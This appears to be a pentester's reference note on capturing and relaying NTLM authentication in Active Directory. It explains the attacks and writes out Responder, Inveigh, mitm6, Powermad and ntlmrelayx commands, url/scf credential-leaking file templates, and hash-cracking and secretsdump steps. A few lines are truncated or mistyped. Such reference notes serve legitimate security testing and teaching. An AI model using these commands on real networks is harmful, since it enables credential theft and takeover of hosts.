# Active Directory - NTLM capture and relay

### Overview

The **LLMNR and NBT-NS poisoning attack**, combined with the **SMB Relay
attack**, or **NTLM Relaying**, can be used to gain an authenticated access to
servers by capturing local network `SMB` authentication traffic and relaying it
to targets servers.

Even when the organization has good patch management practices, this reliable
and effective attack can almost always be leveraged to obtain an initial
foothold.

###### LLMNR and NBT-NS poisoning

The **Link-Local Multicast Name Resolution (LLMNR)** and **Netbios Name
Service (NBT-NS)** protocols can be abused to intercept local network traffic.

These components allow machines on the same subnet to identify hosts when `DNS`
resolution fails. If one machine tries to resolve a particular host, but `DNS`
resolution fails, the machine will then attempt to ask all other machines on
the local network for the correct address via `LLMNR` or `NBT-NS`.

An attacker can listen on a network for these `LLMNR` (`UDP`/5355) or `NBT-NS`
(`UDP`/137) broadcasts requests and respond to them, thus pretending to be the
requested host.

Note that following the Microsoft security bulletin `MS16-077` (Security Update
for `WPAD`), the location of the `WPAD` file (which provide the client its
proxy settings) is no longer requested via broadcast protocols, such as `LLMNR`
and `NBT-NS`, but only via `DNS`.

###### NTLM relaying

The **NT LAN Manager v1 and v2** authentication process, used in by the
**Server Message Block (SMB)** protocol can be subverted.

The attack unwinds as follow:
  1. The victim tries to authenticates himself to a server
     (`SMB_COM_NEGOTIATE` Request)
  2. The authentication request is intercepted by an attacker
  3. The attacker initiates an authentication procedure to a targeted server
     and retrieves an authentication challenge (`NTLM_CHALLENGE_MESSAGE`) from
     this server
  4. The attacker forwards this challenge to the victim
  5. The victim answers the challenge to the attacker
     (`NTLM_AUTHENTICATION_MESSAGE`)  
  6. The attacker can then relay the victim challenge response to the targeted
     server to authenticate as the victim
  7. If the victim has local admin rights on the server, an complete access can
     be acquired   

Since MS08-068 you cannot relay a `Net-NTLM` hash back to the same machine you
got it from (e.g. the 'reflective' attack) unless you're performing a
cross-protocol relay.

For the attack to work, `SMB` Signing needs to be disabled on the targeted
machine. While `SMB` packet signing is available in all supported versions of
Windows, it is enabled by default on Domain Controllers.

### NTLM authentication capture

###### LLMNR and NBT-NS poisoning in practice

*LLMNR detection*

If, after a while, no `NTLM` authentication are captured using the tools listed
below, `nmap` and the `Metasploit`'s `auxiliary/scanner/llmnr/query` module can
be used to check whether or not hosts on the local subnetwork have the `LLMNR`
protocol enabled.

Note that even if `LLMNR` is disabled, system have been hardened but `NBT-NS`
may still be enabled.

To check if a specific host, identified by its hostname, has `LLMNR` activated:

```
nmap --script llmnr-resolve --script-args 'llmnr-resolve.hostname=<HOSTNAME>'
nmap --script llmnr-resolve --script-args 'llmnr-resolve.hostname=<HOSTNAME>' -e <NETWORK_INTERFACE>

# Metasploit
use auxiliary/scanner/llmnr/query
set NAME <HOSTNAME>
run
```

*Responder*

`Responder` can be used to conduct the `LLMNR` and `NBT-NS` poisoning attack.

*The original version of Responder on SpiderLab's Github repository isn't
maintained so lgandx's fork should be prefered instead.*

To capture and crack offline the hashes captured, `Responder` `SMB` and `HTTP`
servers should not be disabled. The authentication attempt won't be transmitted
to the relay servers and no `NTLM` relaying will be conducted.

`Responder` can be configured to automatically attempt to downgrade the
authentication to use the `NetNTLMv1` protocol against clients with a
`LMCompatibilityLevel` attribute set to 2 or lower (which is usually the case
for environment with `Windows XP` / `Windows server 2003` operating systems).
`NetNTLMv1` hashes can be cracked in order to retrieve the client `NTLM` hash,
with the exhaustion of all possibility in a matter of days on a modern
crackstation. Additionally, `www.crack.sh` provides a `rainbow table` for
`NetNTLMv1` hashes obtained with the challenge `1122334455667788`. Useable for
free, this `rainbow table` allows `crack.sh` to achieve an average crack time
of 25 seconds and a success rate of 99.5%.     

`Responder` can be configured to make use of this specific authentication
challenge:

```
# Responder.conf file

Challenge = 1122334455667788
```

`NetNTLMv1` hashes follow the format `<USERNAME>::<HOSTNAME>:<RESPONSE>:
<RESPONSE>:<CHALLENGE>`, with `NTHASH:<RESPONSE>` being the format accepted by
`www.crack.sh`.

Otherwise, `NetNTLMv2` hashes can be cracked using `hashcat`:

```  
hashcat -m 5600 <HASHFILE> <WORDLIST> -o <OUTPUTFILE>
```

To relay `NTLM` authentication, `Responder`'s `SMB` and `HTTP` servers should
be disabled:

```
# Responder.conf file
[Responder Core]

; Servers to start
SQL = On
SMB = Off     # Turn this off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off    # Turn this off
HTTPS = On
DNS = On
LDAP = On
```

With those servers turned off, the authentication attempts captured can be
automatically transmitted to `MultiRelay.py` or `ntlmrelayx.py`'s `SMB` and
`HTTP` servers for the relay attack.

`Responder` usage:

```
# -r : Enable answers for netbios wredir suffix queries
# -d : Enable answers for netbios domain suffix queries
# -w :  Start the WPAD rogue proxy server

python Responder.py -I <NETWORK_INTERFACE> -r -d -w
```

*Inveigh*

`Inveigh` is a PowerShell script that implements `LLMNR`, `NBNS`, `mDNS` /
`DNS` spoofing capabilities and can capture `NetNTLMv1` / `NetNTLMv2`
authentication requests over the `SMB` and `HTTP` / `HTTPS` protocols.  

It can notably be used after the initial compromise of a Windows machine, and
offer some spoofing and capture functionalities even if being run as an
unprivileged user. While elevated privileges are required in order to capture
authentication requests over the `SMB` and `HTTPS` protocols, the spoofing
capabilities and capturing should work pra users will not

```
# Only inspects the LLMNR, NBT-NS and mDNS traffic with out spoofing responses.
Invoke-Inveigh -ConsoleOutput Y -Inspect
Invoke-Inveigh -ConsoleOutput Y -Inspect -IP <IP>
Invoke-Inveigh -ConsoleOutput Y -Inspect -IP <IP>

# Requires elevated privileges.
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y -IP <IP>
```

###### ADIDNS spoofing

In an Active Directory environment, the Domain Controllers will usually expose
`Domain Name System (DNS)` services, that store their `DNS` zones in `Active
Directory Domain Services (AD DS)`. This `DNS` topology is known as
`Active Directory-Integrated DNS (ADIDNS)`.

The `DNS` zones replication to the different Domain Controllers is integrated
to the overall Active Directory replication process. In multi-site Active
Directory infrastructures, the replication between sites of `DNS` record
modification may take up to three hours.

The following `DNS`-specific application directory partitions are created
during `AD DS` installation:
  - A forest-wide application directory partition, called `ForestDnsZones`
  - Domain-wide application directory partitions for each domain in the forest,
  named `DomainDnsZones`

By default, any domain authenticated user may remotely add record
to an `ADIDNS` zone through `DNS dynamic updates` (`DNS` specific protocol),
thanks to the `CreateChild` right on the `DomainDnsZones` domain object.
Existing records can be updated or deleted by privileged domain groups, such as
the `Domain Admins`, `Enterprise Admins`, or `DnsAdmins` groups, as well as the
owner (by default the creator) of the record.  

While requiring valid domain credentials and potentially waiting for a
replication time, spoofing `ADIDNS` records allows to target users and
computers across the domain with out being limited to the local subnetwork.

```
# New-PSDrive is necessary on out-of-the-domain systems, the AD should automatically be mapped otherwise whenever importing the ActiveDirectory PowerShell module
New-PSDrive -Name AD -PSProvider ActiveDirectory -Server "<DC_IP>"

# DOMAIN_ROOT_OBJECT = "DC=LAB,DC=AD" for example
Get-ACL "DC=<DOMAIN_FQDN>,CN=MicrosoftDNS,DC=DomainDNSZones,<DOMAIN_ROOT_OBJECT>" | Select -ExpandProperty Access | ? IdentityReference -match "Authenticated Users"

  ActiveDirectoryRights : CreateChild
  InheritanceType       : None
  ObjectType            : 00000000-0000-0000-0000-000000000000
  InheritedObjectType   : 00000000-0000-0000-0000-000000000000
  ObjectFlags           : None
  AccessControlType     : Allow
  IdentityReference     : NT AUTHORITY\Authenticated Users
  IsInherited           : False
  InheritanceFlags      : None
  PropagationFlags      : None
```

The PowerShell `Powermad` module implements cmdlets that leverage the
`DNS` `dynamic updates` functions to interact with `ADIDNS` zones:

```
# Lists the current or specified domain ADIDNS zones.
Get-ADIDNSZone [-Domain <DOMAIN>] [-DomainController <DC_IP | DC_HOSTNAME>] [-Credential <PSCredential>]

# Attempts to resolve a ADIDNS node.
Resolve-DNSName <DNS_NAME>

# Retrieves the DACL of an ADIDNS zone or node.
# By default, retrieves the DACL for the default Active Directory-Integrated Zone.
Get-ADIDNSPermission [-Domain <DOMAIN>] [-DomainController <DC_IP | DC_HOSTNAME>] [-Credential <PSCredential>]
Get-ADIDNSPermission | ? IdentityReference -match "S-1-5-11"
Get-ADIDNSPermission -Node <DNS_NAME>
Get-ADIDNSPermission -Zone <ADIDNS_ZONE>

# Creates a new ADIDNS node.
# Supported RECORD_TYPE: A, AAAA, CNAME, DNAME, NS, MX, PTR, SRV, or TXT.
# -Tombstone: Sets the dnsTombstoned flag to true when the node is created. This places the node in a state that allows it to be modified or fully tombstoned by any authenticated user.
New-ADIDNSNode -Verbose -Tombstone -Node <DNS_NAME> -Type <A | RECORD_TYPE> -Data <IP | RECORD_CONTENT>
New-ADIDNSNode -Verbose -Tombstone -Domain <DOMAIN> -DomainController <DC_IP | DC_HOSTNAME> -Credential <PSCredential> -Node <DNS_NAME> -Type <A | RECORD_TYPE> -Data <IP | RECORD_CONTENT>

# Removes the specified ADIDNS node.
Remove-ADIDNSNode [-Domain <DOMAIN>] [-DomainController <DC_IP | DC_HOSTNAME>] [-Credential <PSCredential>] -Node <DNS_NAME>

# Additional cmdlets:

# Renames the specified ADIDNS node.
Rename-ADIDNSNode -Node <DNS_NAME> -NodeNew <NEW_DNS_NAME>

# Tombstones an ADIDNS node.
Disable-ADIDNSNode -Node <DNS_NAME>

# Turns a tombstoned ADIDNS node back into a valid record.
Enable-ADIDNSNode -Node <DNS_NAME>

# Returns the owner of an ADIDNS node.
Get-ADIDNSNodeOwner -Node <DNS_NAME>

# Sets the owner of an ADIDNS node.
Set-ADIDNSNodeOwner -Principal "<USERNAME | GROUPNAME>" -Node <DNS_NAME>

# Adds an ACE to an ADIDNS node or zone DACL.
# By default grants the "GenericAll" right to the specified object.
# ACCESS_RIGHT: GenericAll, GenericRead, GenericWrite, WriteDacl, WriteOwner, WriteProperty [...]
Grant-ADIDNSPermission -Principal "<Authenticated Users | USERNAME | GROUPNAME>" -Node <DNS_NAME>
Grant-ADIDNSPermission -Access <ACCESS_RIGHT> -Type "<Allow | Deny>" -Principal "USERNAME | GROUPNAME>" -Node <DNS_NAME>

# Removes an ACE to the specified ADIDNS node or zone DACL.
Revoke-ADIDNSPermission -Access <ACCESS_RIGHT> -Principal "USERNAME | GROUPNAME>" -Node <DNS_NAME>
```

###### IPv6 rogue DHCP server

By default, every Windows system (starting from `Windows Vista`) will request,
upon booting and periodically, an `IPv6` configuration through the `Dynamic
Host Configuration Protocol version 6 (DHCPv6)` protocol by broadcasting a
`Solicit` request. The `mitm6` `Python` utility will listen on the network for
such `DHCPv6` requests and reply to the emitting hosts, assigning them an
`IPv6` address within the link-local range and setting the attacking machine's
`IP` as their default `IPv6` `DNS` server. As no `IPv6` gateway is specified by
`mitm6`, the victim hosts will not attempt to use `IPv6` for communication
with hosts outside the link-local network. The `DNS` server maliciously
configured on a victim host will be preferred to the host's `IPv4` `DNS` server
and used to query for both `A` (`IPv4`) and `AAAA` (`IPv6`) `DNS` records.

In addition to listening for `DHCPv6` requests, `mitm6` will (by default,
although optional) regularly broadcast `ICMPv6` `Router Advertisements (RA)`
messages to announce to the link-local network hosts that an `IPv6` network is
deployed and that an `IPv6` address should be requested via `DHCPv6`.

Immediately after the attacking machine has been configured as the `DNS` server
of a victim host, `mitm6` will receive `DNS` requests from the victim host for
a `Windows Proxy Auto Detection (WPAD)` service, in the form of `DNS` queries
for `wpad.<DOMAIN_FQDN | HOST_NETWORK_INTERFACE_SUFFIX>`. `mitm6` will respond
to such queries by returning the attacking machine's `IP` as the requested
`WPAD` host. As following the Microsoft security bulletin `MS16-077` (Security
Update for `WPAD`) authentication cannot be directly requested by the `WPAD`
server, `mitm6` will instead provide the victim host with a valid `WPAD` file
that configure the attacking machine's `IP` as its proxy. Further `HTTP`
requests made by the victim host will be intercepted and replied to with a
`HTTP 407 Proxy Authentication required` `HTTP` response. The `Internet
Explorer (IE)` / `Edge` and `Chrome` web browsers (which rely on `IE`'s
settings) will automatically authenticate to the proxy under the user identity
using `NTLM`, while `Firefox` will not by default.

Note that in environment making use of `WPAD`, `mitm6` will provide a `WPAD`
`wpad.dat` file over the legitimate `WPAD` servers, which may cause
connectivity issues on the victim hosts, such as an impossibility to reach the
Internet. However, in order to minimize network impact, `mitm6` defines a
`DHCP lease` of 5 minutes and sends `DNS` records with a `Time to Live (TTL)`
limited to only 100 seconds. Thus, a victim host configuration will be back to
normal within a few minutes of `mitm6` stopping.  

`mitm6` should be used in combination with the `Impacket`'s `ntlmrelayx.py`
utility, which will provide the `WPAD` server and relay the `NTLM`
authentication request. Refer to the `IPv6 WPAD relay` section below for more
information on how to execute `ntlmrelayx.py`.

```
# -d: the <DOMAIN> to poison WPAD DNS queries for
mitm6 [-i <NETWORK_INTERFACE>] -d <DOMAIN_FQDN>

# Limits the
mitm6 [-i <NETWORK_INTERFACE>] -d <DOMAIN> -hw <HOSTNAME_FQDN_WHITELIST>
mitm6 [-i <NETWORK_INTERFACE>] -d <DOMAIN> -hb <HOSTNAME_FQDN_BLACKLIST>
```

###### MSRPC MS-RPRN "printer bug"

On a machine running the `Spooler Service` (which is the case by-default for
all Windows systems), the `RpcRemoteFindFirstPrinterChangeNotification(Ex)`
function of the `Print System Remote Protocol`, exposed on the `MS-RPRN`
`MSRPC` interface, can be called by any domain user to force the machine to
authenticate to the specified remote system.

The `NTLM` authentication can be thus be captured and eventually relayed. For
more information on how to identify the `MSRPC` interface and call the
`RpcRemoteFindFirstPrinterChangeNotification` function, refer to the `[L7]
MSRPC` note.

###### Microsoft SQL Server (MSSQL)

The (undocumented) `xp_dirtree`, `xp_fileexist` and `xp_getfiledetails` `SQL`
stored procedures can be used to access files on remote systems over `SMB` from
a `MSSQL` service. By default, the account connecting to the database should
only require the `PUBLIC` role to execute the procedures.

The account running the `SQL` service, be it a local or domain joined account,
will authenticate to the `SMB` share by completing a `Net-NTLMv1` or
`Net-NTLMv2` challenge. The challenge can be captured and eventually relayed.

For more information, refer to the `[L7] MSSQL` note.

###### "Theft" files

Various file types can include content that will automatically trigger an
access to a remote `SMB` network share (requiring an authentication), upon the
opening of the file or a browsing to a folder containing the file.

This technic can be leveraged:
  - in phishing scenarios, both internal and external if the targeted entity
  allows outbound `SMB` traffic
  - from an initial breach inside the internal network / Active Directory
  domain by uploading the file to a network share.

`PingCastle`'s `share` module may be used to identify `SMB` network shares
accessible by all domain users and that could be targeted by such attack. Refer
to the `[ActiveDirectory] AD scanners` note for more information on how to use
`PingCastle`.

The following file types and files can notably be used to trigger an access to
the specified `SMB` service upon the browsing of an user to the directory
containing the file:
  - `url`
  - `scf` (not supported on recent Windows operating systems)
  - `autorun.inf` / `desktop.ini` (not supported on recent Windows operating
    systems)

The following `url` and `scf` files may be used as a template:

*url URL field*

```
[InternetShortcut]
URL=file://<IP>/doesnotmatter/test.html
```

*url IconFile field*

```
[InternetShortcut]
URL=doesnotmatter
WorkingDirectory=doesnotmatter
IconFile=\\<IP>\%USERNAME%.icon
IconIndex=1
```

*scf*

```
[Shell]
Command=2
IconFile=\\<IP>\doesnotmatter\test.ico
[Taskbar]
Command=ToggleDesktop
```

The `ntlm_theft.py` Python script allows for the generation of various "theft"
files, such as `url`, `scf`, `docx`, `xlsx`, `pdf`, etc:

```
python3 ntlm_theft.py --generate all -s <IP> -f <OUTPUT_FOLDER>
```

###### Exchange Web Services (EWS) SOAP API

TODO

### NTLM authentication relay

###### Hosts with SMB signing disabled

First, a list of host with `SMB signing` must be gathered.

Either `nmap`, `CMEv4` or `PingCastle` (personal favorite) can be used to
gather a list of host with `SMB signing` disabled and output the result to a
file:

```bash
PingCastle.exe -> 5-scanner -> a-smb -> 1-all

nmap -v -sU -sS --open -oA nmap_smb_signing_off --script smb-security-mode.nse -p U:137,T:139,445 <TARGETS>
cat nmap_smb_signing_off.nmap | grep -B 14 "message_signing: disabled" | grep "Nmap scan report for" | cut -d " " -f 5 > <FILE>

cme smb <HOSTNAME | IP | CIDR | TARGETS_FILE> --gen-relay-list <FILE>
```

###### Basic relay

The `Impacket`'s `ntlmrelayx.py` or `MultiRelay.py`, that comes with the
`Responder` toolkit for example, `Python` scripts can be used to relay the
`NTLM` authentication.  

By default, `ntlmrelayx` will dump the `SAM` base of the system the
authentication is relayed to. As that functionality may sometimes fail, the
execution of a unitary command could be preferred instead.

`ntlmrelayx` additionally implements the deployment of a `SOCKS` server that
holds all the relayed sessions active and serves them to `SOCKS` clients. When
started with the `-socks` option, `ntlmrelayx` will keep the authenticated
sessions on hold, through protocols specific `KeepAlive` methods, and will
allow `SOCKS` clients to connect to the targeted remote host through the
`SOCKS` server by leveraging an active session. More information on the
implementation can be found on the `Impacket` maintainer's blog:
`https://www.secureauth.com/blog/playing-relayed-credentials`.

`ntlmrelayx` supports relaying `NTLM` authentication through the following
protocols:
  - `SMB` / `SMB2`
  - `LDAP` / `LDAPS`
  - `MSSQL`
  - `IMAP` / `IMAPS`
  - `HTTP` / `HTTPS`
  - `SMTP`

The authentication can be relayed to a specific service (such as
`smb://<TARGET_IP | TARGET_HOSTNAME>`, `ldaps://<TARGET_IP | TARGET_HOSTNAME>`,
etc.) or to all services (`all://<TARGET_IP | TARGET_HOSTNAME>`) of the
targeted system.

```
MultiRelay.py -t <TARGET_IP | TARGET_HOSTNAME> -c '<COMMAND>' -u '<ALL | USERNAME_TO_RELAY>'

# The TARGETS_FILE file should contain a list of target(s) in the form of [<SERVICE | all>://]<TARGET_IP | TARGET_HOSTNAME>, with one target per line.
ntlmrelayx.py [-smb2support] -t <TARGET_IP | TARGET_HOSTNAME | TARGET_SERVICE> -l <DIRECTORY_OUTPUT>
ntlmrelayx.py [-smb2support] -tf <TARGETS_FILE> -l <DIRECTORY_OUTPUT>
ntlmrelayx.py [-smb2support] -t <TARGET_IP | TARGET_HOSTNAME | TARGET_SERVICE> -c <COMMAND>

# SOCKS usage examples

# Starts ntlmrelayx.py in SOCKS proxy mode  
ntlmrelayx.py [-smb2support] -t <TARGET_IP | TARGET_HOSTNAME | TARGET_SERVICE> -socks
ntlmrelayx.py [-smb2support] -tf <TARGETS_FILE> -socks

# Lists the active sessions.
ntlmrelayx> socks
  Protocol  Target          Username                                 Port
  --------  -------------   ------------------------------           ----
  SMB       <IP_SMB_EX>     <DOMAIN | HOSTNAME>/<USERNAME_SMB_EX>    445
  MSSQL     <IP_MSSQL_EX>   <DOMAIN | HOSTNAME>/<USERNAME_MSSQL_EX>  1433
  SMTP      <IP_SMTP_EX>    <DOMAIN | HOSTNAME>/<USERNAME_SMTP_EX>   25
  IMAP      <IP_IMAP_EX>    <DOMAIN | HOSTNAME>/<USERNAME_IMAP_EX>   143

# Proxychains can be used to proxy commands network traffic through ntlmrelayx SOCKS service. Some tools may natively embed SOCKS4 proxy support.
# Configuration and usage of Proxchains.
# Configurationfile: /etc/proxychains.conf
[ProxyList]
socks4 	<LOCAL_HOST_RUNNING_NTLMRELAYX_IP> 1080

# The ntlmrelayx "SOCKS Relay Plugin" will handle the connection and fake the login process in order to tunnel an authenticated connection.
# If a password is required by the tool used, a random password can be provided.

# SMB examples.
proxychains smbclient //<IP_SMB_EX>/<SHARE> -U <DOMAIN>/<USERNAME_SMB_EX>
proxychains secretsdump.py <DOMAIN>/<USERNAME_SMB_EX>@<IP_SMB_EX>
[...]

# MSSQL example.
proxychains mssqlclient.py -windows-auth <DOMAIN>/<USERNAME_MSSQL_EX>@<IP_MSSQL_EX>

# SMTP example.
Thunderbird can be configured to make use of ntlmrelayx SOCKS service.
The Authentication method should be set to "Normal Password" and the (Server Setting->Advanced) "Maximum number of server connections to cache" set to 1.
The under "Network Setting" the SOCKS service can be specifed.
For more information, refer to: https://www.secureauth.com/blog/playing-relayed-credentials.
```

###### IPv6 WPAD relay

The `Impacket`'s `ntlmrelayx.py` utility can be used to relay `NTLM`
authentication captured using the `mitm6` utility.

```
# The authentication can be relayed to a specific service, such as smb://<TARGET_IP | TARGET_HOSTNAME> or ldaps://<TARGET_IP | TARGET_HOSTNAME>
# -wh: the specified WPAD hostname should be a hostname not in use in the victim network

ntlmrelayxpy -6 [-smb2support] -wh <FAKE_WPAD_HOST> -t <TARGET_IP | TARGET_HOSTNAME | TARGET_SERVICE>
ntlmrelayxpy -6 [-smb2support] -wh <FAKE_WPAD_HOST> -t <TARGET_IP | TARGET_HOSTNAME | TARGET_SERVICE> -c <COMMAND>
ntlmrelayxpy -6 [-smb2support] -wh <FAKE_WPAD_HOST> -t <TARGET_IP | TARGET_HOSTNAME | TARGET_SERVICE> -socks
```
